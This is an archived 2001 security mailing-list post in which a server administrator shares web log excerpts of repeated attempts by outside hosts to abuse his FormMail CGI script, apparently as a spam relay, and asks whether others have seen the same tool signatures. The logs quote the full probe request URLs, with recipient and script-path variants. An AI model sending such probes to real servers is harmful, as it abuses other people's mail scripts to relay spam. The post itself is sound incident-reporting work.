formmail

From: Soeren Ziehe (robintonat_private)
Date: Sat Sep 01 2001 - 14:50:00 PDT

  • Next message: Michael J. Cannon: "Re: Code Red - A Possible Origin?" 

    Hello incidents,

while looking at our weblogs something caught my eye this week.

There was an attempt to use a formmail perl script installed on our
server from a non-local address.

A quick grep trough our weblogs for this month and back to the beginning
of this year revealed a ton of requests for the 20th this month and a
few requests on the 11th, 23th, 27th and 29th.

OK. Here's the beef:

I "censored" the last digits of the culprits IP address or the  first  
part of the culprits DNS name. Also [server] stands for the hostname of  
my server.

It all began on the 11th.

xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:13 +0200] "GET /cgi- 
bin/ 
formmail.pl?recipient=johnday32at_private&subject=:-)&email=sexychickgrrrl 
@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 404 "-"  
"Microsoft URL Control - 6.00.8169"
xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:14 +0200] "GET /cgi- 
bin/ 
FormMail.pl?recipient=johnday32at_private&subject=:-)&email=sexychickgrrrl 
@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-"  
"Microsoft URL Control - 6.00.8169"

The first request met a 301 redirect and then accessed the formmail  
script via its correct name (200 code).
However mail logs show no outgoing mail resulting from this. This was to  
be expected as the script has been modified to prevent this kind of  
abuse.
Does anyone know what "Microsoft URL Control" is? I guess a VB6 OCX, am  
I right?

OK. After this initial probe there was a ton of hits on the 20th.

195.223.69.xxx - - [20/Aug/2001:08:08:07 +0200] "GET /cgi-bin/ 
formmail.pl?email=chemieat_private&recipient=extractorguyat_private&subje 
ct=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM  
Agent 1.0"

  [505(!) similar loglines omitted]
.. [20/Aug/2001:08:14:00 +0200] ...
.. [20/Aug/2001:21:08:26 +0200] ...
  [214(!) similar loglines omitted]

195.223.69.xxx - - [20/Aug/2001:21:16:21 +0200] "GET /cgi-bin/ 
formmail.pl?email=chemieat_private&recipient=extractorguyat_private&subje 
ct=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM  
Agent 1.0"

Different AOL mailbox as recipient and different tool signature.
Each of the request was met with a 301 (redirect permanent) status code  
since the scriptname is not correct (one off, mod_speling]

I have to guess that the program/script was on "auto" mode and maybe did  
not know how to cope with a 301 redirect and kept retrying (until  
threshhold value was hit or until user intervention).
There were two waves approx. 08:08 (507 hits) and 21:08 (216 hits) on  
the 20th.

Things started again on the 23th.

xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:04 +0200]  
"GET /cgi-bin/ 
formmail.pl?recipient=johnday32at_private&subject=monkr&email=jhat_private&= 
http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 393 "-" "Microsoft URL  
Control - 6.00.8169"
xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:16 +0200]  
"GET /cgi-bin/ 
FormMail.pl?recipient=johnday32at_private&subject=monkr&email=jhat_private&= 
http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-" "Microsoft URL  
Control - 6.00.8169"

Again another provider, but same recipient mail box and tool signature  
as on the 11th.

On the 23th we've got the same recipient and provider as on the 20th,  
but different "tool" signature.

195.223.69.xx - - [23/Aug/2001:05:01:51 +0200] "GET /cgi-bin/ 
formmail.pl?email=extractorguyat_private&recipient=Extractorguyat_private&su 
bject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl  
HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT  
5.0)"
195.223.69.xxx - - [23/Aug/2001:05:01:52 +0200] "GET /cgi-bin/ 
FormMail.pl?email=extractorguyat_private&recipient=Extractorguyat_private&su 
bject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl  
HTTP/1.0" 200 343 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT  
5.0)"
195.223.69.xxx - - [23/Aug/2001:05:57:45 +0200] "GET /cgi-bin/ 
formmail.pl?email=extractorguyat_private&recipient=Extractorguyat_private&su 
bject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl  
HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT  
5.0)"

First 301 redirect, then correct request. Then again redirect with no  
follow up (why?).

The 27th brings us again the "URL Control" but with a slightl different  
version number.
NO recipient given, but several variants of location and script name  
tried.

xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/ 
formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-bin/ 
formmail.cgi HTTP/1.1" 300 892 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/ 
formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/ 
formmail.pl HTTP/1.1" 301 361 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/ 
formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-local/ 
formmail.cgi HTTP/1.1" 404 414 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/ 
FormMail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/ 
formmail.pl HTTP/1.1" 200 891 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/ 
formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-local/ 
formmail.pl HTTP/1.1" 404 412 "-" "Microsoft URL Control - 6.00.8862"

On the 29th different provider, but the same tool signature as the 27th.  
Basically the same location/scriptname variants tried, however this time  
the same AOL mailbox as for the 20th were given.

xxx.dialsprint.net - - [29/Aug/2001:05:56:49 +0200] "GET /cgi-bin/ 
formmail.pl?recipient=extractorguyat_private&subject=WWW%20Form%20Submissi 
on&email=cgierrrat_private&=http://[server]/cgi-bin/formmail.pl HTTP/1.1"  
301 419 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:50 +0200] "GET /cgi-bin/ 
formmail.cgi?recipient=extractorguyat_private&subject=WWW%20Form%20Submiss 
ion&email=cgierrrat_private&=http://[server]/cgi-bin/formmail.cgi HTTP/ 
1.1" 300 1132 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/ 
formmail.cgi?recipient=extractorguyat_private&subject=WWW%20Form%20Submiss 
ion&email=cgierrrat_private&=http://[server]/cgi-local/formmail.cgi HTTP/ 
1.1" 404 472 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/ 
formmail.pl?recipient=extractorguyat_private&subject=WWW%20Form%20Submissi 
on&email=cgierrrat_private&=http://[server]/cgi-local/formmail.pl HTTP/ 
1.1" 404 470 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:54 +0200] "GET /cgi-bin/ 
FormMail.pl?recipient=extractorguyat_private&subject=WWW%20Form%20Submissi 
on&email=cgierrrat_private&=http://[server]/cgi-bin/formmail.pl HTTP/1.1"  
200 355 "-" "Microsoft URL Control - 6.00.8862"


IF you've stayed with me until here. Has anyone seen the same access  
attempts patterns/tool signatures?

Robinton

-- 
I've asked for kindness and ultimate truth. Still waiting for the answer.
-- 
Wo Recht zu Unrecht wird, wird Widerstand zur Rechtsfrage.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Sun Sep 02 2001 - 02:18:08 PDT